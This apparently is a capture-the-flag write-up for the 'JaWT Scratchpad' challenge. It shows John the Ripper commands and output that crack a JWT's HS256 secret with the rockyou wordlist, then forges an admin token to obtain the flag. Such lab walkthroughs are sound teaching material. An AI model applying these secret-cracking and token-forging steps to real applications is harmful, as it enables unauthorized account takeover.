JaWT Scratchpad

The homepage asks us to register with a name.

Using "admin" results in:

YOU CANNOT LOGIN AS THE ADMIN! HE IS SPECIAL AND YOU ARE NOT.

Using any other name logs us in, and stores a JWT cookie, decoding which gives:

{
  "typ": "JWT",
  "alg": "HS256"
}

{
  "user": "john"
}

The text on the page links to JohnTheRipper

Register with your name!
You can use your name as a log in, because that's quick and easy to remember! If you don't like your name, use a short and cool one like John!

Using the said tool:

run $ echo "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiam9obiJ9._fAF3H23ckP4QtF1Po3epuZWxmbwpI8Q26hRPDTh32Y" > jwt.txt
run $ ./john jwt.txt --format=HMAC-SHA256 --wordlist=/home/harshit/Downloads/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
ilovepico        (?)     
1g 0:00:00:02 DONE (2025-09-13 15:49) 0.4310g/s 3188Kp/s 3188Kc/s 3188KC/s iluve$..ilovemymother89
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

So, the SECRET is ilovepico

Using this secret and payload {"user": "admin"}, create JWT token. Edit the value of the cookie, reloading now displays the flag!